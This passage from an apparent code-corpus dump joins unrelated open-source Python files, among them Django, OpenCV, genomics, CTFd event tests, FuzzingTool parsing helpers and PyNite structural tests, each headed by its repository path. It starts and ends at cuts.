model_name="nomination",
name="nominee",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="nominations",
to="nominations.Nominee",
),
),
migrations.AlterUniqueTogether(
name="nominee", unique_together={("user", "election")}
),
]
|
ch22-直方图/22.3.4.hsv_hist-绘制2D直方图.py | makelove/OpenCV-Python-Tutorial | 2,875 | 46853 | <filename>ch22-直方图/22.3.4.hsv_hist-绘制2D直方图.py
# -*-coding:utf8-*-#
__author__ = 'play4fun'
"""
create time: 15-11-8 4:44 PM
Plot a 2D histogram
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('../data/home.jpg')
# cv2.imshow("src", img)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hist = cv2.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])
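# channels [0, 1] are Hue and Saturation of the HSV image; 180 and 256 bins
# cover OpenCV's value ranges [0, 180) and [0, 256), so `hist` is a 180x256 2D array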
plt.imshow(hist, interpolation='nearest')
plt.show()
|
WebMirror/management/rss_parser_funcs/feed_parse_extractExpandablefemaleBlogspotCom.py | fake-name/ReadableWebProxy | 193 | 46862 | def extractExpandablefemaleBlogspotCom(item):
'''
DISABLED
Parser for 'expandablefemale.blogspot.com'
'''
return None |
lav/train_bev.py | Kin-Zhang/LAV | 122 | 46869 | import tqdm
import torch
from lav.lav_privileged import LAV
from lav.utils.datasets import get_data_loader
from lav.utils.logger import Logger
def main(args):
dmd = LAV(args)
data_loader = get_data_loader('bev', args)
logger = Logger('lav_bev', args)
save_dir = logger.save_dir
torch.manual_seed(args.seed)
# logger.watch_model(dmd.uniplanner)
global_it = 0
for epoch in range(args.num_epoch):
for data in tqdm.tqdm(data_loader, desc=f'Epoch {epoch}'):
opt_info = dmd.train_bev(*data)
if global_it % args.num_per_log == 0:
logger.log_bev_info(global_it, opt_info)
global_it += 1
dmd.bev_scheduler.step()
if (epoch+1) % args.num_per_save == 0:
bev_path = f'{save_dir}/bev_{epoch+1}.th'
torch.save(dmd.state_dict('bev'), bev_path)
print (f'save to {bev_path}')
logger.save([bev_path])
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--config-path', default='config.yaml')
parser.add_argument('--device', default='cuda', choices=['cuda', 'cpu'])
# Training misc
parser.add_argument('--num-epoch', type=int, default=160)
parser.add_argument('--num-per-log', type=int, default=100, help='log per iter')
parser.add_argument('--num-per-save', type=int, default=10, help='save per epoch')
parser.add_argument('--batch-size', type=int, default=512)
parser.add_argument('--lr', type=float, default=3e-4)
parser.add_argument('--num-workers', type=int, default=16)
# Reproducibility (still not fully determinstic due to CUDA/CuDNN)
parser.add_argument('--seed', type=int, default=2021)
args = parser.parse_args()
main(args)
|
selene_sdk/targets/tests/test_genomic_features.py | msindeeva/selene | 307 | 46893 | <gh_stars>100-1000
import os
import unittest
import numpy as np
from selene_sdk.targets import GenomicFeatures
from selene_sdk.targets.genomic_features import _any_positive_rows, \
_is_positive_row, _get_feature_data
class TestGenomicFeatures(unittest.TestCase):
def setUp(self):
self.features = [
"CTCF", "eGFP-FOS", "GABP", "Pbx3", "Pol2", "TBP"
]
self.feature_index_map = {
"CTCF": 0, "eGFP-FOS": 1, "GABP": 2, "Pbx3": 3, "Pol2": 4, "TBP": 5
}
self.n_features = len(self.features)
# CTCF only, between 16110 and 16239
self.rows_example1 = \
[["1", "16110", "16190", "CTCF"], # len 70
["1", "16128", "16158", "CTCF"], # len 30
["1", "16149", "16239", "CTCF"]] # len 90
# CTCF only, between 91128 and 91358
self.rows_example2 = \
[["2", "91128", "91358", "CTCF"], # len 200
["2", "91130", "91239", "CTCF"], # len 109
["2", "91156", "91310", "CTCF"]] # len 154
# multiple features, between 8533 and 9049
self.rows_example3 = \
[["chr3", "8533", "8817", "eGFP-FOS"], # len 284
["chr3", "8541", "8651", "GABP"], # len 110
["chr3", "8574", "8629", "Pol2"], # len 145
["chr3", "8619", "9049", "CTCF"], # len 430
["chr3", "8620", "8680", "TBP"], # len 60
["chr3", "8645", "8720", "TBP"]] # len 75
def get_feature_rows(self, chrom, start, end):
"""This function disregards (`start`, `end`) input
"""
if chrom is None:
return None
if chrom == "1":
return self.rows_example1
elif chrom == "2":
return self.rows_example2
elif chrom == "3":
return self.rows_example3
else:
return []
############################################
# Correctness tests for `_is_positive_row`
############################################
def test__is_positive_row_false(self):
query_start, query_end = (16150, 16351) # len 201
feat_start, feat_end = (16110, 16190) # len 80
threshold = 0.50
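        # overlap is 16190 - 16150 = 40 bases of a 201-base query (~0.20 < 0.50),
        # so the row should not count as positive (assuming overlap-fraction semantics)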
self.assertFalse(
_is_positive_row(
query_start, query_end, feat_start, feat_end, threshold))
def test__is_positive_row_true_eq_threshold(self):
query_start, query_end = (16110, 16309) # len 199
feat_start, feat_end = (16110, 16190) # len 80
threshold = 0.40
self.assertTrue(
_is_positive_row(
query_start, query_end, feat_start, feat_end, threshold))
def test__is_positive_row_true_gt_threshold(self):
query_start, query_end = (16110, 16311) # len 201
        feat_start, feat_end = (16110, 16290)    # len 180
threshold = 0.80
self.assertTrue(
_is_positive_row(
query_start, query_end, feat_start, feat_end, threshold))
############################################
# Correctness tests for `_any_positive_rows`
############################################
def test__any_positive_rows_none_rows(self):
rows = None
query_start, query_end = (10, 100)
threshold = {k: 0.50 for k in self.features}
self.assertFalse(
_any_positive_rows(rows, query_start, query_end, threshold))
def test__any_positive_rows_empty_rows(self):
rows = []
query_start, query_end = (10, 100)
threshold = {k: 0.50 for k in self.features}
self.assertFalse(
_any_positive_rows(rows, query_start, query_end, threshold))
def test__any_positive_rows_false(self):
rows = self.rows_example1
query_start, query_end = (16150, 16351)
threshold = {k: 0.50 for k in self.features}
self.assertFalse(
_any_positive_rows(rows, query_start, query_end, threshold))
def test__any_positive_rows_true(self):
rows = self.rows_example1
query_start, query_end = (16150, 16351)
threshold = {k: 0.40 for k in self.features}
self.assertTrue(
_any_positive_rows(rows, query_start, query_end, threshold))
############################################
# Correctness tests for `_get_feature_data`
############################################
def test__get_feature_data_none_rows(self):
query_chrom, query_start, query_end = (None, 10, 211)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [0, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_empty_rows(self):
query_chrom, query_start, query_end = ("7", 10, 211)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [0, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_single_feat_positive(self):
query_chrom, query_start, query_end = ("1", 16100, 16350)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [1, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_no_feat_positive(self):
query_chrom, query_start, query_end = ("2", 91027, 91228)
threshold = np.array([0.51] * self.n_features).astype(np.float32)
expected_encoding = [0, 0, 0, 0, 0, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_multiple_feats_positive(self):
query_chrom, query_start, query_end = ("3", 8619, 8719)
threshold = np.array([0.50] * self.n_features).astype(np.float32)
expected_encoding = [1, 1, 0, 0, 0, 1]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
def test__get_feature_data_different_thresholds(self):
query_chrom, query_start, query_end = ("3", 8619, 8719)
threshold = np.array([0.50, 0.0, 0.0, 0.0, 0.0, 1.0]).astype(np.float32)
expected_encoding = [1, 1, 1, 0, 1, 0]
observed_encoding = _get_feature_data(
query_chrom, query_start, query_end, threshold,
self.feature_index_map, self.get_feature_rows)
self.assertSequenceEqual(
observed_encoding.tolist(), expected_encoding)
############################################
# GenomicFeatures integration tests
############################################
def test_GenomicFeatures_single_threshold(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, 0.50)
self.assertDictEqual(
query_features.feature_thresholds,
{k: 0.50 for k in self.features})
self.assertSequenceEqual(
query_features._feature_thresholds_vec.tolist(),
[0.50] * self.n_features)
def test_GenomicFeatures_diff_thresholds(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features,
{"default": 0.50, "CTCF": 0.0, "Pol2": 0.15})
self.assertEqual(
query_features.feature_thresholds,
{"CTCF": 0.0, "eGFP-FOS": 0.50,
"GABP": 0.50, "Pbx3": 0.50,
"Pol2": 0.15, "TBP": 0.50})
np.testing.assert_almost_equal(
query_features._feature_thresholds_vec.tolist(),
[0.0, 0.50, 0.50, 0.50, 0.15, 0.50])
def test_GenomicFeatures_lambda_thresholds(self):
def _feature_thresholds(f):
if f == "Pbx3":
return 0.30
elif f == "CTCF":
return 0.40
else:
return 0.50
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, _feature_thresholds)
self.assertEqual(
query_features.feature_thresholds,
{"CTCF": 0.40, "eGFP-FOS": 0.50,
"GABP": 0.50, "Pbx3": 0.30,
"Pol2": 0.50, "TBP": 0.50})
np.testing.assert_almost_equal(
query_features._feature_thresholds_vec.tolist(),
[0.40, 0.50, 0.50, 0.30, 0.50, 0.50])
def test_GenomicFeatures_no_thresholds__get_feature_data(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, feature_thresholds=None)
expected_feature_data = np.zeros(self.n_features)
expected_feature_data[self.feature_index_map['CTCF']] = 1.
# NOTE: "1 16110 16390 CTCF" is the first line in the test data.
actual_feature_data = query_features.get_feature_data('1', 16110, 16390)
np.testing.assert_array_almost_equal(
actual_feature_data,
expected_feature_data
)
def test_GenomicFeatures_0_5_threshold__get_feature_data(self):
data_path = os.path.join(
"selene_sdk", "targets", "tests",
"files", "sorted_aggregate.bed.gz")
query_features = GenomicFeatures(
data_path, self.features, feature_thresholds=0.5)
# NOTE: "1 16110 16390 CTCF" is the first line in the test data.
# Overlap is less than a threshold:
np.testing.assert_array_almost_equal(
query_features.get_feature_data('1', 16000, 17000),
np.zeros(self.n_features)
)
# Overlap is greater than a threshold:
expected_feature_data = np.zeros(self.n_features)
expected_feature_data[self.feature_index_map['CTCF']] = 1.
np.testing.assert_array_almost_equal(
query_features.get_feature_data('1', 16000, 16500),
expected_feature_data
)
if __name__ == "__main__":
unittest.main()
|
timesearch_modules/get_styles.py | clayne/timesearch | 127 | 46911 | <filename>timesearch_modules/get_styles.py
import os
import requests
from . import common
from . import tsdb
session = requests.Session()
def get_styles(subreddit):
(database, subreddit) = tsdb.TSDB.for_subreddit(subreddit, fix_name=True)
print('Getting styles for /r/%s' % subreddit)
subreddit = common.r.subreddit(subreddit)
styles = subreddit.stylesheet()
database.styles_dir.makedirs(exist_ok=True)
stylesheet_filepath = database.styles_dir.with_child('stylesheet.css')
print('Downloading %s' % stylesheet_filepath.relative_path)
with stylesheet_filepath.open('w', encoding='utf-8') as stylesheet:
stylesheet.write(styles.stylesheet)
for image in styles.images:
image_basename = image['name'] + '.' + image['url'].split('.')[-1]
image_filepath = database.styles_dir.with_child(image_basename)
print('Downloading %s' % image_filepath.relative_path)
with image_filepath.open('wb') as image_file:
response = session.get(image['url'])
image_file.write(response.content)
def get_styles_argparse(args):
return get_styles(args.subreddit)
|
corehq/motech/dhis2/tests/test_tasks.py | akashkj/commcare-hq | 471 | 46940 | from django.test import TestCase
from corehq import toggles
from corehq.motech.dhis2.tasks import send_datasets_for_all_domains
class TestSendDatasetsForAllDomains(TestCase):
domain_name = 'does-not-exist'
def setUp(self):
toggles.DHIS2_INTEGRATION.set(
self.domain_name,
enabled=True,
namespace=toggles.NAMESPACE_DOMAIN
)
def tearDown(self):
toggles.DHIS2_INTEGRATION.set(
self.domain_name,
enabled=False,
namespace=toggles.NAMESPACE_DOMAIN
)
def test_check_domain_exists(self):
"""
send_datasets_for_all_domains() should not raise an AttributeError
if a domain does not exist
"""
send_datasets_for_all_domains()
|
tests/data/expected/main/multiple_files_self_ref_single/output.py | adaamz/datamodel-code-generator | 891 | 46965 | <reponame>adaamz/datamodel-code-generator
# generated by datamodel-codegen:
# filename: test.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from pydantic import BaseModel, Field
class Second(BaseModel):
__root__: str
class First(BaseModel):
__root__: Second
class Model(BaseModel):
test_id: str = Field(..., description='test ID')
test_ip: First
|
modoboa/lib/tests/test_web_utils.py | HarshCasper/modoboa | 1,602 | 46976 | <gh_stars>1000+
"""Tests for web_utils."""
from django.test import SimpleTestCase
from .. import web_utils
class TestCase(SimpleTestCase):
"""Test functions."""
def test_size2integer(self):
self.assertEqual(web_utils.size2integer("1024"), 1024)
# Convert to bytes
self.assertEqual(web_utils.size2integer("1K"), 1024)
self.assertEqual(web_utils.size2integer("1M"), 1048576)
self.assertEqual(web_utils.size2integer("1G"), 1073741824)
# Convert to megabytes
self.assertEqual(web_utils.size2integer("1K", output_unit="MB"), 0)
self.assertEqual(web_utils.size2integer("1M", output_unit="MB"), 1)
self.assertEqual(web_utils.size2integer("1G", output_unit="MB"), 1024)
# Unsupported unit
with self.assertRaises(ValueError):
web_utils.size2integer("1K", output_unit="GB")
|
src/fuzzingtool/utils/utils.py | NESCAU-UFLA/FuzzingTool | 131 | 47002 | # Copyright (c) 2020 - present <NAME> <https://github.com/VitorOriel>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from .consts import FUZZING_MARK
from typing import List, Tuple, Union
def getIndexesToParse(content: str, searchFor: str = FUZZING_MARK) -> List[int]:
"""Gets the indexes of the searched substring into a string content
@type content: str
@param content: The parameter content
@type searchFor: str
    @param searchFor: The substring whose indexes are searched for in the given content
    @returns List[int]: The position indexes of the searched substring
"""
return [i for i, char in enumerate(content) if char == searchFor]
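# Illustrative usage (with '$' standing in for the single-character FUZZING_MARK,
# whose actual value is defined in .consts and not shown here):
#   getIndexesToParse("a$b$c", '$')  ->  [1, 3]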
def splitStrToList(
string: str,
separator: str = ',',
ignores: str = '\\'
) -> List[str]:
"""Split the given string into a list, using a separator
@type string: str
@param string: The string to be splited
@type separator: str
@param separator: A separator to split the string
@type ignores: str
    @param ignores: A string used to escape the separator
@returns List[str]: The splited string
"""
if string:
if f'{ignores}{separator}' in string:
final = []
buffer = ''
for substr in string.split(separator):
if substr[-1] == ignores:
buffer += substr[:-1]+separator
else:
final.extend([buffer+substr])
buffer = ''
return final
return string.split(separator)
return []
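# Illustrative usage:
#   splitStrToList('a,b\\,c')        ->  ['a', 'b,c']   (escaped separator is kept)
#   splitStrToList('GET;POST', ';')  ->  ['GET', 'POST']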
def stringfyList(oneList: list) -> str:
"""Stringfies a list
@type oneList: list
@param oneList: A list to be stringed
@returns str: The stringed list
"""
output = ''
for i in range(len(oneList)-1):
output += f"{oneList[i]},"
output += oneList[-1]
return output
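# Illustrative usage:
#   stringfyList(['a', 'b', 'c'])  ->  'a,b,c'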
def getHumanLength(length: int) -> Tuple[Union[int, float], str]:
"""Get the human readable length from the result
@type length: int
@param length: The length of the response body
@returns Tuple[int|float, str]: The tuple with new length and the readable order
"""
for order in ["B ", "KB", "MB", "GB"]:
if length < 1024:
return (length, order)
length /= 1024
return (length, "TB")
def checkRangeList(content: str) -> List[Union[int, str]]:
"""Checks if the given content has a range list,
    and makes a list of the range specified
@type content: str
@param content: The string content to check for range
@returns List[int|str]: The list with the compiled content
"""
def getNumberRange(left: str, right: str) -> List[int]:
"""Get the number range list
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[int]: The list with the range
"""
isNumber = True
i = len(left)
while isNumber and i > 0:
try:
int(left[i-1])
except:
isNumber = False
else:
i -= 1
leftDigit, leftStr = int(left[i:]), left[:i]
isNumber = True
i = 0
while isNumber and i < (len(right)-1):
try:
int(right[i+1])
except Exception as e:
isNumber = False
else:
i += 1
rightDigit, rightStr = int(right[:(i+1)]), right[(i+1):]
compiledList = []
if leftDigit < rightDigit:
while leftDigit <= rightDigit:
compiledList.append(
f"{leftStr}{str(leftDigit)}{rightStr}"
)
leftDigit += 1
else:
while rightDigit <= leftDigit:
compiledList.append(
f"{leftStr}{str(leftDigit)}{rightStr}"
)
leftDigit -= 1
return compiledList
def getLetterRange(left: str, right: str) -> List[str]:
"""Get the alphabet range list [a-z] [A-Z] [z-a] [Z-A]
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[str]: The list with the range
"""
leftDigit, leftStr = left[-1], left[:-1]
rightDigit, rightStr = right[0], right[1:]
compiledList = []
if ord(leftDigit) <= ord(rightDigit):
orderLeftDigit = ord(leftDigit)
orderRightDigit = ord(rightDigit)
while orderLeftDigit <= orderRightDigit:
compiledList.append(
f"{leftStr}{chr(orderLeftDigit)}{rightStr}"
)
orderLeftDigit += 1
else:
orderLeftDigit = ord(leftDigit)
orderRightDigit = ord(rightDigit)
while orderLeftDigit >= orderRightDigit:
compiledList.append(
f"{leftStr}{chr(orderLeftDigit)}{rightStr}"
)
orderLeftDigit -= 1
return compiledList
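    # Illustrative results of the helpers above:
    #   checkRangeList("a1-3b")  ->  ['a1b', 'a2b', 'a3b']   (numeric range)
    #   checkRangeList("a-c")    ->  ['a', 'b', 'c']         (letter range)
    #   checkRangeList("1\\-3")  ->  ['1-3']                 (escaped dash, no range)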
if '\-' in content:
content = content.replace('\-', '-')
elif '-' in content:
left, right = content.split('-', 1)
try:
# Checks if the left and right digits from the mark are integers
int(left[-1])
int(right[0])
return getNumberRange(left, right)
except:
return getLetterRange(left, right)
return [content] |
tests/utils/test_events.py | nox237/CTFd | 3,592 | 47009 | <filename>tests/utils/test_events.py<gh_stars>1000+
from collections import defaultdict
from queue import Queue
from unittest.mock import patch
from redis.exceptions import ConnectionError
from CTFd.config import TestingConfig
from CTFd.utils.events import EventManager, RedisEventManager, ServerSentEvent
from tests.helpers import create_ctfd, destroy_ctfd, login_as_user, register_user
def test_event_manager_installed():
"""Test that EventManager is installed on the Flask app"""
app = create_ctfd()
assert type(app.events_manager) == EventManager
destroy_ctfd(app)
def test_event_manager_subscription():
"""Test that EventManager subscribing works"""
with patch.object(Queue, "get") as fake_queue:
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
saved_event = {"type": "notification", "data": saved_data}
fake_queue.return_value = saved_event
event_manager = EventManager()
events = event_manager.subscribe()
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == {"data": "", "type": "ping"}
assert message.__str__().startswith("event:ping")
assert len(event_manager.clients) == 1
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == saved_event
assert message.__str__().startswith("event:notification\ndata:")
assert len(event_manager.clients) == 1
def test_event_manager_publish():
"""Test that EventManager publishing to clients works"""
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
event_manager = EventManager()
q = defaultdict(Queue)
event_manager.clients[id(q)] = q
event_manager.publish(data=saved_data, type="notification", channel="ctf")
event = event_manager.clients[id(q)]["ctf"].get()
event = ServerSentEvent(**event)
assert event.data == saved_data
def test_event_endpoint_is_event_stream():
"""Test that the /events endpoint is text/event-stream"""
app = create_ctfd()
with patch.object(Queue, "get") as fake_queue:
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
saved_event = {"type": "notification", "data": saved_data}
fake_queue.return_value = saved_event
with app.app_context():
register_user(app)
with login_as_user(app) as client:
r = client.get("/events")
assert "text/event-stream" in r.headers["Content-Type"]
destroy_ctfd(app)
def test_redis_event_manager_installed():
"""Test that RedisEventManager is installed on the Flask app"""
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/1"
CACHE_REDIS_URL = "redis://localhost:6379/1"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
assert isinstance(app.events_manager, RedisEventManager)
destroy_ctfd(app)
def test_redis_event_manager_subscription():
"""Test that RedisEventManager subscribing works."""
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/2"
CACHE_REDIS_URL = "redis://localhost:6379/2"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
saved_event = {"type": "notification", "data": saved_data}
with patch.object(Queue, "get") as fake_queue:
fake_queue.return_value = saved_event
event_manager = RedisEventManager()
events = event_manager.subscribe()
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == {"data": "", "type": "ping"}
assert message.__str__().startswith("event:ping")
message = next(events)
assert isinstance(message, ServerSentEvent)
assert message.to_dict() == saved_event
assert message.__str__().startswith("event:notification\ndata:")
destroy_ctfd(app)
def test_redis_event_manager_publish():
"""Test that RedisEventManager publishing to clients works."""
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/3"
CACHE_REDIS_URL = "redis://localhost:6379/3"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
saved_data = {
"user_id": None,
"title": "asdf",
"content": "asdf",
"team_id": None,
"user": None,
"team": None,
"date": "2019-01-28T01:20:46.017649+00:00",
"id": 10,
}
event_manager = RedisEventManager()
event_manager.publish(data=saved_data, type="notification", channel="ctf")
destroy_ctfd(app)
def test_redis_event_manager_listen():
"""Test that RedisEventManager listening pubsub works."""
    # This test is not currently working properly
    # This test is sort of incomplete b/c we aren't also subscribing
    # I wasn't able to get listening and subscribing to work at the same time
# But the code does work under gunicorn and serve.py
try:
# import importlib
# from gevent.monkey import patch_time, patch_socket
# from gevent import Timeout
# patch_time()
# patch_socket()
class RedisConfig(TestingConfig):
REDIS_URL = "redis://localhost:6379/4"
CACHE_REDIS_URL = "redis://localhost:6379/4"
CACHE_TYPE = "redis"
try:
app = create_ctfd(config=RedisConfig)
except ConnectionError:
print("Failed to connect to redis. Skipping test.")
else:
with app.app_context():
# saved_event = {
# "data": {
# "team_id": None,
# "user_id": None,
# "content": "asdf",
# "title": "asdf",
# "id": 1,
# "team": None,
# "user": None,
# "date": "2020-08-31T23:57:27.193081+00:00",
# "type": "toast",
# "sound": None,
# },
# "type": "notification",
# }
event_manager = RedisEventManager()
# def disable_retry(f, *args, **kwargs):
# return f()
# with patch("tenacity.retry", side_effect=disable_retry):
# with Timeout(10):
# event_manager.listen()
event_manager.listen()
# event_manager.publish(
# data=saved_event["data"], type="notification", channel="ctf"
# )
destroy_ctfd(app)
finally:
pass
# import socket
# import time
# importlib.reload(socket)
# importlib.reload(time)
|
alipay/aop/api/domain/AlipayOfflineProviderShopactionRecordModel.py | snowxmas/alipay-sdk-python-all | 213 | 47022 | <filename>alipay/aop/api/domain/AlipayOfflineProviderShopactionRecordModel.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OuterShopDO import OuterShopDO
class AlipayOfflineProviderShopactionRecordModel(object):
def __init__(self):
self._action_detail = None
self._action_outer_id = None
self._action_type = None
self._date_time = None
self._entity = None
self._industry = None
self._outer_shop_do = None
self._source = None
self._user_id = None
@property
def action_detail(self):
return self._action_detail
@action_detail.setter
def action_detail(self, value):
self._action_detail = value
@property
def action_outer_id(self):
return self._action_outer_id
@action_outer_id.setter
def action_outer_id(self, value):
self._action_outer_id = value
@property
def action_type(self):
return self._action_type
@action_type.setter
def action_type(self, value):
self._action_type = value
@property
def date_time(self):
return self._date_time
@date_time.setter
def date_time(self, value):
self._date_time = value
@property
def entity(self):
return self._entity
@entity.setter
def entity(self, value):
self._entity = value
@property
def industry(self):
return self._industry
@industry.setter
def industry(self, value):
self._industry = value
@property
def outer_shop_do(self):
return self._outer_shop_do
@outer_shop_do.setter
def outer_shop_do(self, value):
if isinstance(value, OuterShopDO):
self._outer_shop_do = value
else:
self._outer_shop_do = OuterShopDO.from_alipay_dict(value)
@property
def source(self):
return self._source
@source.setter
def source(self, value):
self._source = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.action_detail:
if hasattr(self.action_detail, 'to_alipay_dict'):
params['action_detail'] = self.action_detail.to_alipay_dict()
else:
params['action_detail'] = self.action_detail
if self.action_outer_id:
if hasattr(self.action_outer_id, 'to_alipay_dict'):
params['action_outer_id'] = self.action_outer_id.to_alipay_dict()
else:
params['action_outer_id'] = self.action_outer_id
if self.action_type:
if hasattr(self.action_type, 'to_alipay_dict'):
params['action_type'] = self.action_type.to_alipay_dict()
else:
params['action_type'] = self.action_type
if self.date_time:
if hasattr(self.date_time, 'to_alipay_dict'):
params['date_time'] = self.date_time.to_alipay_dict()
else:
params['date_time'] = self.date_time
if self.entity:
if hasattr(self.entity, 'to_alipay_dict'):
params['entity'] = self.entity.to_alipay_dict()
else:
params['entity'] = self.entity
if self.industry:
if hasattr(self.industry, 'to_alipay_dict'):
params['industry'] = self.industry.to_alipay_dict()
else:
params['industry'] = self.industry
if self.outer_shop_do:
if hasattr(self.outer_shop_do, 'to_alipay_dict'):
params['outer_shop_do'] = self.outer_shop_do.to_alipay_dict()
else:
params['outer_shop_do'] = self.outer_shop_do
if self.source:
if hasattr(self.source, 'to_alipay_dict'):
params['source'] = self.source.to_alipay_dict()
else:
params['source'] = self.source
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOfflineProviderShopactionRecordModel()
if 'action_detail' in d:
o.action_detail = d['action_detail']
if 'action_outer_id' in d:
o.action_outer_id = d['action_outer_id']
if 'action_type' in d:
o.action_type = d['action_type']
if 'date_time' in d:
o.date_time = d['date_time']
if 'entity' in d:
o.entity = d['entity']
if 'industry' in d:
o.industry = d['industry']
if 'outer_shop_do' in d:
o.outer_shop_do = d['outer_shop_do']
if 'source' in d:
o.source = d['source']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
Testing/test_springs.py | geosharma/PyNite | 199 | 47033 | # -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 <NAME>, SE; tamalone1
"""
import unittest
from PyNite import FEModel3D
import sys
from io import StringIO
class Test_Spring_Elements(unittest.TestCase):
''' Tests of spring members.'''
def setUp(self):
# Suppress printed output temporarily
sys.stdout = StringIO()
def tearDown(self):
# Reset the print function to normal
sys.stdout = sys.__stdout__
def test_spring_elements(self):
# A First Course in the Finite Element Method, 4th Edition
# <NAME>
# Example 2.1
# Units for this model are pounds and inches
system = FEModel3D()
system.add_node('1', 0, 0, 0)
system.add_node('2', 30, 0, 0)
system.add_node('3', 10, 0, 0)
system.add_node('4', 20, 0, 0)
# Add spring members
system.add_spring('S1', '1', '3', 1000)
system.add_spring('S2', '3', '4', 2000)
system.add_spring('S3', '4', '2', 3000)
# Define supports
system.def_support('1', True, True, True, True, True, True)
system.def_support('2', True, True, True, True, True, True)
system.def_support('3', False, True, True, True, True, True)
system.def_support('4', False, True, True, True, True, True)
# Add node loads
system.add_node_load('4', 'FX', 5000)
system.analyze(True)
# Check results
# correct_values = [('3', 0.9090909090909092),
# ('4', 1.3636363636363638),
# ('1', -909.0909090909091),
# ('2', -4090.9090909090914)]
n3_DX = system.Nodes['3'].DX['Combo 1']
self.assertAlmostEqual(n3_DX/ 0.9090909090909092, 1.0, 2)
n4_DX = system.Nodes['4'].DX['Combo 1']
